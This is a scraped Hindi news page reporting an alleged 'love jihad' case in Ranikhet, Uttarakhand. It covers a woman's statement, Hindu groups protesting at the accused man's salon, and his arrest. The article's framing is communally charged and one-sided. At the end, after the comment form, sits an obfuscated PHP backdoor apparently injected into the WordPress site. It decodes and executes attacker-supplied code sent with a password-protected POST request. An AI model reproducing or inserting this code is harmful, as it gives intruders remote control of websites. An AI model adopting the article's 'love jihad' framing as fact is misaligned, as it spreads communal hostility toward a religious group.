Uttarakhand: अब रानीखेत में Love Jihad की ‘आग’, महिला को बहला फुसला कर भगा ले जाना और धर्मांतरण की साजिश

Uttarakhand Press 03 July 2023: Love Jihad in Almora द्वाराहाट की ग्रामीण महिला को प्रलोभन देकर उसे भगाने और धर्म परिवर्तन कराने के मामले में हिंदूवादी संगठन भड़क उठे। महिला ने बयान दिया कि आरोपित मो. चांद उसे बहला फुसला कर ले गया। शादी का झांसा देकर उससे शारीरिक संबंध बनाए। किसी को बताने पर जान से मारने की धमकी भी दी। प्रदर्शनकारियों ने कहा कि लव जिहाद किसी सूरत में बर्दास्त नहीं किया जाएगा।

द्वाराहाट की ग्रामीण महिला को प्रलोभन देकर उसे भगाने और धर्म परिवर्तन कराने के मामले में हिंदूवादी संगठन भड़क उठे। कोतवाली में सीओ व कोतवाल से मिलने के बाद संगठन से जुड़े युवा कचहरी लाइन स्थित सीढ़ी बाजार जा धमके। आरोपित हेयर ड्रेसर की दुकान का घेराव कर प्रदर्शन किया और वहीं धरने पर बैठ गए। नारेबाजी के बीच प्रदर्शनकारियों ने कहा कि पर्यटन नगरी में लव जिहाद किसी सूरत में बर्दास्त नहीं किया जाएगा।

कहा कि सुनियोजित तरीके से शहर का माहौल खराब करने की साजिश रची जा रही है। बाद में जुलूस की शक्ल में गांधी चौक पहुंचे युवाओं ने सांकेतिक धरना दिया।

महिला को बहला फुसला कर भगा ले जाना धर्मांतरण की साजिश:
कथित लव जिहाद प्रकरण पर हिंदूवादी संगठनों के लोग रविवार को कोतवाली पहुंचे। उन्होंने सीओ तिलकराम वर्मा व कोतवाल हेमचंद्र पंत से वार्ता की। घटना को निंदनीय बताते हुए पुलिस की त्वरित कार्रवाई को सराहनीय बताया। साथ ही आरोप लगाया कि समुदाय विशेष के युवक का ग्रामीण महिला को बहला फुसला कर भगा ले जाना धर्मांतरण की साजिश का हिस्सा है।

उन्होंने रानीखेत नगर के साथ ही ताड़ीखेत व गनियाद्योली क्षेत्र में रहने वाले संदिग्ध लोगों का नियमित सत्यापन कराने की भी पुरजोर मांग उठाई। बाद में संगठनों के लोग नारेबाजी करते हुए कचहरी लाइन पहुंचे। सीढ़ी बाजार स्थित आरोपित मो. चांद के सैलून के बाहर नारेबाजी कर प्रदर्शन किया।

फिर प्रदर्शनकारी गांधी चौक पहुंचे। संक्षिप्त सभा व सांकेतिक धरना दिया। इस दौरान भाजयुमो जिलाध्यक्ष पावस जोशी, पूर्व सैनिक दिगंबर मनराल, विहिप के राजेंद्र अधिकारी, प्रधान तौड़ा मंजीत भगत, तरुण जोशी, मनोज जोशी, दर्शन बिष्ट, सूरज आदि मौजूद रहे।

पुलिस की तत्परता से टल गया बवंडर:
कथित लवजिहाद प्रकरण पर खाकी की त्वरित कार्रवाई ने बड़ा बवाल टाल दिया। बीती शाम कोतवाली पहुंचे महिला के पति व अन्य स्वजनों की शिकायत पर सीओ व कोतवाल ने न केवल गौर किया गया।

बल्कि आरोपित से संपर्क साध उसकी लोकेशन भी ट्रेस करते रहे। इधर कोतवाल हेम पंत ने मो. चांद के स्वजनों पर शिकंजा कसा तो आरोपित को दो घंटे के भीतर दबोच लिया गया। इससे माहौल काफी हद तक शांत हो गया और संभावित बवंडर भी टल गया।

महिला का बयान:
महिला ने बयान दिया कि आरोपित मो. चांद उसे बहला फुसला कर ले गया। शादी का झांसा देकर उससे शारीरिक संबंध बनाए। किसी को बताने पर जान से मारने की धमकी भी दी।

Read Previous

Land Jihad in Uttarakhand: नदियों के किनारे अतिक्रमण पर आज से चलेगा डंडा, 23 नदियां चिह्नित

Read Next

Accident: ट्रक ने ट्रैक्टर-ट्रॉली में मारी टक्कर, 3 युवकों की मौत, 10 लोग हुए घायल

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}